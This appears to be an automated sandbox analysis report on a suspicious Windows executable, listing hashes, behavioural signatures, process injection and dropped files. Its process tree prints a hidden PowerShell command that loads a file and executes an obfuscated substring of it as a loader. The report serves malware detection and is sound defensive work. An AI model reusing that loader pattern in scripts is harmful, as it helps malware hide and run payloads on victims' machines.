Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 02:17
Static task
static1
Behavioral task
behavioral1
Sample
228979659-051450-sanlccjavap0004-1343.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
228979659-051450-sanlccjavap0004-1343.exe
Resource
win10v2004-20240508-en
General
-
Target
228979659-051450-sanlccjavap0004-1343.exe
-
Size
537KB
-
MD5
4bd7d05eb541d2987245dd88304a740d
-
SHA1
24addd4494289c2039fb4ff2310102214cf30274
-
SHA256
e784c7c5d73af9afbdfa923dfbf5549ad2488e7ffaa3b8d6b9abe30d84e8542d
-
SHA512
f62e2bfd1ba9d0ce9b0bac90e139b5dbbac96fbd55877c5157e06a20746ac54ae6b4ad0cb25c72f407bc067639d0b17ad749c9250dacfbdfb1ef86518036afd9
-
SSDEEP
12288:5WHa/AUQJ+M1yw9+kvcw0QoanljEXNt151X:QHeQJ+Mh9b0fW8bX
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4996 5088 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepid process 5088 powershell.exe 5088 powershell.exe 5088 powershell.exe 5088 powershell.exe 5088 powershell.exe 5088 powershell.exe 5088 powershell.exe 5088 powershell.exe 5088 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 5088 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
228979659-051450-sanlccjavap0004-1343.exepowershell.exedescription pid process target process PID 4764 wrote to memory of 5088 4764 228979659-051450-sanlccjavap0004-1343.exe powershell.exe PID 4764 wrote to memory of 5088 4764 228979659-051450-sanlccjavap0004-1343.exe powershell.exe PID 4764 wrote to memory of 5088 4764 228979659-051450-sanlccjavap0004-1343.exe powershell.exe PID 5088 wrote to memory of 1476 5088 powershell.exe cmd.exe PID 5088 wrote to memory of 1476 5088 powershell.exe cmd.exe PID 5088 wrote to memory of 1476 5088 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\228979659-051450-sanlccjavap0004-1343.exe"C:\Users\Admin\AppData\Local\Temp\228979659-051450-sanlccjavap0004-1343.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Underreprsentations=Get-Content 'C:\Users\Admin\AppData\Local\Aftalesystemet97\Mobocracy\Telefonordrens.Inc';$Sedums=$Underreprsentations.SubString(67989,3);.$Sedums($Underreprsentations)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:1476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 24363⤵
- Program crash
PID:4996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5088 -ip 50881⤵PID:1960
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Aftalesystemet97\Mobocracy\Telefonordrens.IncFilesize
66KB
MD5c13ae53ab364e546d46106f605d4ef0e
SHA1e792c346caa828e4d1bc7d5c07591aa8e082cf8d
SHA2567eae55bb3fc7f9251404f03e008b5f2ae03cc9d77a93cbca6067a7cc13498002
SHA512f36ace15696c54f42f5ac81cf080a52083220dfaeae940b3ab0763d3e53a67e06600ae059432f84d2d35fe07e7f5f2748625942165ccdd2df3ca19f317876f68
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u2qno1sm.pjq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/5088-20-0x0000000074060000-0x0000000074810000-memory.dmpFilesize
7.7MB
-
memory/5088-35-0x00000000066D0000-0x000000000671C000-memory.dmpFilesize
304KB
-
memory/5088-16-0x000000007406E000-0x000000007406F000-memory.dmpFilesize
4KB
-
memory/5088-21-0x00000000057E0000-0x0000000005802000-memory.dmpFilesize
136KB
-
memory/5088-22-0x0000000005FE0000-0x0000000006046000-memory.dmpFilesize
408KB
-
memory/5088-23-0x0000000006050000-0x00000000060B6000-memory.dmpFilesize
408KB
-
memory/5088-18-0x0000000005840000-0x0000000005E68000-memory.dmpFilesize
6.2MB
-
memory/5088-33-0x00000000062A0000-0x00000000065F4000-memory.dmpFilesize
3.3MB
-
memory/5088-34-0x0000000006680000-0x000000000669E000-memory.dmpFilesize
120KB
-
memory/5088-19-0x0000000074060000-0x0000000074810000-memory.dmpFilesize
7.7MB
-
memory/5088-36-0x0000000007650000-0x00000000076E6000-memory.dmpFilesize
600KB
-
memory/5088-37-0x0000000006BF0000-0x0000000006C0A000-memory.dmpFilesize
104KB
-
memory/5088-38-0x0000000006C10000-0x0000000006C32000-memory.dmpFilesize
136KB
-
memory/5088-39-0x0000000007CA0000-0x0000000008244000-memory.dmpFilesize
5.6MB
-
memory/5088-17-0x00000000050E0000-0x0000000005116000-memory.dmpFilesize
216KB
-
memory/5088-41-0x00000000088D0000-0x0000000008F4A000-memory.dmpFilesize
6.5MB
-
memory/5088-43-0x0000000074060000-0x0000000074810000-memory.dmpFilesize
7.7MB